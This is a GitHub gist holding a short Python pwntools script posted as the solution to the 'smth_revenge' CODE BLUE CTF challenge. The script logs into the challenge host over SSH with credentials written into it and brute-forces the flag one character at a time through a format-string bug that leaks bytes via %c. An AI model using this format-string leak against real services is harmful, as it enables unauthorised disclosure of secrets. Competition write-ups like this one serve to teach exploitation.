Created
August 3, 2018 03:26
-
-
Save ujin5/b1f2c49fffda1ad52edaf62d313ccf24 to your computer and use it in GitHub Desktop.
smth_revenge solution
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
''' | |
there is format string bug. howerever you only use %n,%c,%d because smth use custom printf. | |
by using %c you leak flag. | |
''' | |
from pwn import * | |
p = ssh("smth_chal","pwn2.task.ctf.codeblue.jp",password="whats_smth") | |
dat = "DbD: Dead by Daytime Sun lololo" | |
k = "" | |
table = [chr(i) for i in range(0x1f,0x80)] | |
print table | |
r = "" | |
for i in range(32): | |
c = '' | |
j = 0 | |
print r | |
dat += k | |
print "CBCTF{%s"%dat | |
while( c != '\x18'): | |
s = p.run("/home/smth_revenge/smth_revenge") | |
s.recvuntil(':') | |
k = table[j] | |
s.sendline("CBCTF{"+(dat+k)+"\x18 %c%c;") | |
r = s.recvuntil(';') | |
c = r[-2:-1] | |
j = j +1 | |
s.close() | |
s.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment